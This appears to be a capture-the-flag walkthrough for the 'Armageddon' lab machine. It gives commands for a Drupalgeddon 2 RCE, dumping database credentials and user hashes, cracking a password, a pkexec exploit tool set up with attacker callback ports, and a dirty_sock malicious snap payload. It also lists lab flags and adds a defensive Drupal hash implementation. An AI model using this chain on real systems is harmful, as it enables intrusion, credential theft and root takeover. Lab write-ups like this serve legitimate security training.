[Meachines] [Easy] Armageddon: Drupal 7 RCE + TRP00F privilege escalation + Snap dirty_sock privilege escalation
Word count: 1242 | 2025-08-29 08:30:25
Armageddon Target Machine Penetration Testing Teaching Document
1. Information Gathering Phase
1.1 Host Discovery and Port Scanning
ip='10.10.10.233'; itf='tun0'
# Host discovery (ping scan only); adding -Pn here would skip discovery and always report the host as up
if nmap -sn "$ip" | grep -q "Host is up"; then
    echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
    # masscan all TCP and UDP ports, then turn the port numbers into a comma-separated list for nmap
    ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -nu | tr '\n' ',' | sed 's/,$//')
    if [ -n "$ports" ]; then
        echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
        # Version detection and default scripts on the discovered ports only
        nmap -Pn -sV -sC -p "$ports" "$ip"
    else
        echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
    fi
else
    echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
fi
Scan results:
- 22/tcp: OpenSSH 7.4 (protocol 2.0)
- 80/tcp: Apache httpd 2.4.6 (CentOS) PHP/5.4.16, running Drupal 7
1.2 Web Application Identification
Identified from the HTTP response headers:
- HTTP generator: Drupal 7 (http://drupal.org)
- Server header: Apache/2.4.6 (CentOS) PHP/5.4.16
robots.txt lists 36 disallowed directories and files, including the standard Drupal directory structure.
2. Initial Access - Drupal 7 RCE (Drupalgeddon 2)
2.1 Exploiting the Vulnerability
Run the Drupalgeddon 2 exploit script:
ruby drupalgeddon2.rb http://10.10.10.233/
2.2 Obtaining Database Credentials
The database credentials are found in the Drupal configuration file:
cat /var/www/html/sites/default/settings.php
Credentials found:
- Username: drupaluser
- Password: CQHEy@9M*m23gBVj
2.3 Database Operations
List the databases (the password is single-quoted so the shell does not expand the `*`):
mysql -u drupaluser -p'CQHEy@9M*m23gBVj' -e "SHOW DATABASES;"
Dump the drupal database:
mysqldump -u drupaluser -p'CQHEy@9M*m23gBVj' drupal > res.txt
Extract the user data:
grep "INSERT INTO \`users\`" res.txt
2.4 Cracking User Passwords
Crack the hashes with John the Ripper (the wordlist is passed with --wordlist=; a bare -w followed by a space would make John treat rockyou.txt as another hash file):
john hash --wordlist=rockyou.txt
Password recovered: booboo
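The hashes pulled from the `users` table above are Drupal 7 `$S$` hashes: a cost character, an 8-character salt and a custom base64 encoding of an iterated SHA-512. The following is an added example (my own Python re-implementation of the scheme in Drupal core's password.inc, not code from this walkthrough or from the tools it names; the function names are mine) that shows how such a hash is verified and what the default work factor is, so a defender can see why 2^15 rounds still do not protect a dictionary word like `booboo`.

```python
import hashlib
import hmac
import os

# phpass alphabet used by Drupal: '.' '/' 0-9 A-Z a-z (index = 6-bit value)
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55  # stored hashes are truncated to 55 characters
DRUPAL_HASH_COUNT = 15   # default cost character 'D': 2**15 SHA-512 rounds

def phpass_base64(data: bytes) -> str:
    """Drupal's little-endian base64 (not RFC 4648), as in password.inc."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def drupal7_crypt(password: str, setting: str) -> str:
    """Recompute a '$S$' hash from its 12-char prefix: $S$ + cost char + 8-char salt."""
    if not setting.startswith("$S$"):
        raise ValueError("not a Drupal 7 SHA-512 hash")
    count_log2 = ITOA64.index(setting[3])  # 'D' -> 15 -> 32768 rounds
    salt, pw = setting[4:12].encode(), password.encode()
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.sha512(digest + pw).digest()
    return (setting[:12] + phpass_base64(digest))[:DRUPAL_HASH_LENGTH]

def drupal7_hash(password: str, count_log2: int = DRUPAL_HASH_COUNT, salt=None) -> str:
    """Hash a new password; 6 random salt bytes encode to exactly 8 characters."""
    salt = os.urandom(6) if salt is None else salt
    return drupal7_crypt(password, "$S$" + ITOA64[count_log2] + phpass_base64(salt))

def drupal7_verify(password: str, stored: str) -> bool:
    """Constant-time comparison of a candidate password against a stored hash."""
    return hmac.compare_digest(drupal7_crypt(password, stored), stored)
```

Raising count_log2 makes each guess cost more, but a wordlist hit such as `booboo` only needs one guess, so the real mitigation is password policy, not the cost parameter.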
2.5 Obtaining the User Flag
User flag (User.txt):
1afa82c98c5e7cd47410189b10c366d9
3. Lateral Movement - TRP00F Privilege Escalation
3.1 Using the TRP00F Tool
python3 trp00f.py --lhost 10.10.16.33 --lport 10000 --rhost 10.10.16.33 --rport 10032 --http 9999
When asked whether to exploit the pkexec vulnerability, choose 'y'.
4. Privilege Escalation - Snap dirty_sock Vulnerability
4.1 Preparing the Environment
Install snapd:
sudo apt install snapd
4.2 Generating the Malicious Snap Package
Use Python to generate the base64-encoded malicious snap package:
python2 -c 'print "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" + "A" * 4256' | base64 -d > exp.snap
4.3 Exploiting the Vulnerability
Switch to the dirty_sock user and obtain root:
su dirty_sock
sudo su
4.4 Obtaining the Root Flag
Root.txt contents:
cc24a5b72cb785d9a58d812e2ba3ea93
5. Key Tools and Resources
- Drupalgeddon 2 exploit script:
  - https://github.com/dreadlocked/Drupalgeddon2/blob/master/drupalgeddon2.rb
- TRP00F privilege escalation tool:
  - https://github.com/MartinxMax/trp00f
- Dirty Sock vulnerability information:
  - https://shenaniganslabs.io/2019/02/13/Dirty-Sock.html
  - https://github.com/initstring/dirty_sock/blob/master/dirty_sockv2.py
6. Summary
This penetration test demonstrates a complete attack chain from a web application vulnerability (Drupalgeddon 2) to system privilege escalation (dirty_sock). Key points:
- Initial access through a known RCE vulnerability in Drupal 7
- Database credentials obtained from a configuration file disclosure
- User credentials obtained through database operations
- Intermediate privilege escalation with TRP00F
- Root obtained at the end through Snap's dirty_sock vulnerability